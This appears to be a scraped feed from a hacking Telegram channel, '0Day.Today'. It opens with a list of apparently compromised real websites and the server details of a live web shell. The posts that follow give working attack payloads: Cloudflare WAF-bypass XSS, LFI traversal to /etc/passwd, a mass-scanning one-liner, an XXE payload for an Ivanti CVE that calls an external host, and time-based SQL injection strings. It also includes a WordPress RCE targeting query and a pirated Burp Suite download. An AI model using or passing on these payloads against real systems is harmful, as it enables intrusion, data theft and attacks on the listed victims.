https://ipebs.in/
https://govacancia.com/
http://rivieravoyages.com/
http://mail.rivieravoyages.com/
https://stavolink.com/
https://tridentresortsholidays.com/
https://deparagon.com/
http://woosquare.deparagon.com/index1707261924.html
http://ebaymasterkey.deparagon.com/
http://masterkey.deparagon.com/
http://multi.deparagon.com/
http://search.deparagon.com/
http://smspress.deparagon.com/
Country:
#Deface
0Day.Today Please open Telegram to view this post
VIEW IN TELEGRAM
PHP: 8.1.27
Safe Mode: OFF
ServerIP: 213.158.95.90 [🇮🇹 ]
HDD: Total:1536.00 GB
Free:1322.97 GB [86%]
useful:--------------
Downloader: --------------
Disable Functions: All Functions Accessible
CURL : ON | SSH2 : OFF | Magic Quotes : OFF | MySQL : ON | MSSQL : OFF | PostgreSQL : ON | Oracle : OFF | CGI : OFF
Open_basedir : NONE | Safe_mode_exec_dir : NONE | Safe_mode_include_dir : NONE
SoftWare: nginx/1.22.0
🔗 Link
Enjoy...⭐️
#Shell
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
🔥
📣 T.me/BugCod3
📣 T.me/LearnExploit
Safe Mode: OFF
ServerIP: 213.158.95.90 [
HDD: Total:1536.00 GB
Free:1322.97 GB [86%]
useful:--------------
Downloader: --------------
Disable Functions: All Functions Accessible
CURL : ON | SSH2 : OFF | Magic Quotes : OFF | MySQL : ON | MSSQL : OFF | PostgreSQL : ON | Oracle : OFF | CGI : OFF
Open_basedir : NONE | Safe_mode_exec_dir : NONE | Safe_mode_include_dir : NONE
SoftWare: nginx/1.22.0
Enjoy...
#Shell
0Day.Today Please open Telegram to view this post
VIEW IN TELEGRAM
CloudFlare Bypass
#Bypass #XSS
——————
0Day.Today
@LearnExploit
@Tech_Army
<Img Src=OnXSS OnError=alert(1)>#Bypass #XSS
——————
0Day.Today
@LearnExploit
@Tech_Army
LFI Payload⚡️
Payload:
#LFI #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
Payload:
".%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd"#LFI #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
0Day.Today | Learn Exploit | Zero World | Dark web |
LFI Payload⚡️ Payload: ".%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd" #LFI #Payload —————— 0Day.Today @LearnExploit @Tech_Army
Sick Finding 🥵⚡️
#tip
——————
0Day.Today
@LearnExploit
@Tech_Army
cat rootDomains.txt | assetfinder -subs-only | httpx -silent -p 80,443,8080,8443,9000 -nc -path ".%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd" -mr "root:x" | tee -a p1s.txt#tip
——————
0Day.Today
@LearnExploit
@Tech_Army
CVE-2024-22024 - XXE on Ivanti Connect Secure
payload encoded base64:
⚠️ send it to 127.0.0.1/dana-na/auth/saml-sso.cgi with SAMLRequest parm
#CVE #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
payload encoded base64:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % xxe SYSTEM "http://{{external-host}}/x"> %xxe;]><r></r>⚠️ send it to 127.0.0.1/dana-na/auth/saml-sso.cgi with SAMLRequest parm
#CVE #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
Please open Telegram to view this post
VIEW IN TELEGRAM
Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers. The Empire server is written in Python 3 and is modular to allow operator flexibility. Empire comes built-in with a client that can be used remotely to access the server. There is also a GUI available for remotely accessing the Empire server, Starkiller.
cd Empire
./setup/checkout-latest-tag.sh
./setup/install.sh
#Hacktoberfest #C2 #Redteam #Infrastructure
Please open Telegram to view this post
VIEW IN TELEGRAM
cloudflare WAF bypass XSS
any payload they blocked by cloudflare
this payload working
#Cloudflare #Bugbounty #Tip
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
any payload they blocked by cloudflare
this payload working
"><img src=x onerrora=confirm() onerror=confirm(1)>#Cloudflare #Bugbounty #Tip
Please open Telegram to view this post
VIEW IN TELEGRAM
burpsuite_pro_v2024.zip
692.2 MB
Burp Suite Version 2024 🔻
❌ نکته : برای اجرا شدن نیاز به Java ورژن 18 به بالا نیاز خواهید داشت .✔️
#burpsuite
——————
0Day.Today
@LearnExploit
@Tech_Army
#burpsuite
——————
0Day.Today
@LearnExploit
@Tech_Army
Please open Telegram to view this post
VIEW IN TELEGRAM
Cloudflare WAF Bypass Leads to Reflected XSS ®️
Payload Used :⛔
Payload Used :
#WAF #Bypass #XSS
——————
0Day.Today
@LearnExploit
@Tech_Army
Payload Used :
"><img src=x onerror=alert(1)> [Blocked By Cloudflare] Payload Used :
"><img src=x onerrora=confirm() onerror=confirm(1)> [XSS Popup]#WAF #Bypass #XSS
——————
0Day.Today
@LearnExploit
@Tech_Army
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
7 SQLs
4 in php
1 in aspx
2 in graphql
#SQL #sql_injection
——————
0Day.Today
@LearnExploit
@Tech_Army
4 in php
(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/1 in aspx
orwa';%20waitfor%20delay%20'0:0:6'%20--%202 in graphql
orwa') OR 11=(SELECT 11 FROM PG_SLEEP(6))--#SQL #sql_injection
——————
0Day.Today
@LearnExploit
@Tech_Army
PoC + Nuclei + Query CVE-2024-25600 Unauth RCE - WordPress Bricks - 1.9.6 CVSS 9.8
Query Fofa: body="/wp-content/themes/bricks/"
POC
Nuclei
#POC #Wordpress #RCE #CVE
——————
0Day.Today
@LearnExploit
@Tech_Army
Query Fofa: body="/wp-content/themes/bricks/"
POC
Nuclei
#POC #Wordpress #RCE #CVE
——————
0Day.Today
@LearnExploit
@Tech_Army
Google Dorks to Find Sensitive data or dir
#google #cybersec #infosec
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
#google #cybersec #infosec
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
Found SQL Injection in [org_id] Cookie
Payloads for Testing:
Injected in request like this
#BugBounty #Tips #SQL
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
Payloads for Testing:
-1 OR 0=6 AND 0-0=> FALSE-1 OR 6=6 AND 0-0=> TRUEInjected in request like this
Cookie:organization_id=-1%20OR%200%3D6%20AND%200-0#BugBounty #Tips #SQL
Please open Telegram to view this post
VIEW IN TELEGRAM
#Notification #Warning
Please open Telegram to view this post
VIEW IN TELEGRAM